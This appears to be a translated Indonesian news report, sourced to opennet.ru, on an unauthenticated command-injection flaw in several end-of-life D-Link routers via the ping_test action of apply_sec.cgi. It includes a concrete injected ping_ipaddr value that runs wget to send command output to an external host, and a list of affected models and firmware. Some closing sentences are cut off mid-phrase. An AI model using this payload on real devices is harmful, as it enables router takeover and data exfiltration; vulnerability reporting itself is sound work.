Di router nirkabel D-Link
Menariknya, menurut pengembang firmware, panggilan "ping_test" harus dijalankan hanya setelah otentikasi, tetapi kenyataannya panggilan itu tetap dipanggil, terlepas dari masuk ke antarmuka web. Khususnya, saat mengakses skrip apply_sec.cgi dan meneruskan parameter βaction=ping_testβ, skrip dialihkan ke halaman autentikasi, tetapi pada saat yang sama melakukan tindakan yang terkait dengan ping_test. Untuk mengeksekusi kode, kerentanan lain digunakan di ping_test itu sendiri, yang memanggil utilitas ping tanpa memeriksa kebenaran alamat IP yang dikirim untuk pengujian dengan benar. Misalnya, untuk memanggil utilitas wget dan mentransfer hasil perintah βecho 1234β ke host eksternal, cukup tentukan parameter βping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// tes.tes/?$( echo 1234)".
Kehadiran kerentanan telah dikonfirmasi secara resmi pada model berikut:
- DIR-655 dengan firmware 3.02b05 atau lebih lama;
- DIR-866L dengan firmware 1.03b04 atau lebih lama;
- DIR-1565 dengan firmware 1.01 atau lebih lama;
- DIR-652 (tidak ada informasi tentang versi firmware yang bermasalah)
Masa dukungan untuk model ini telah berakhir, jadi D-Link
Belakangan diketahui bahwa kerentanannya juga demikian
Sumber: opennet.ru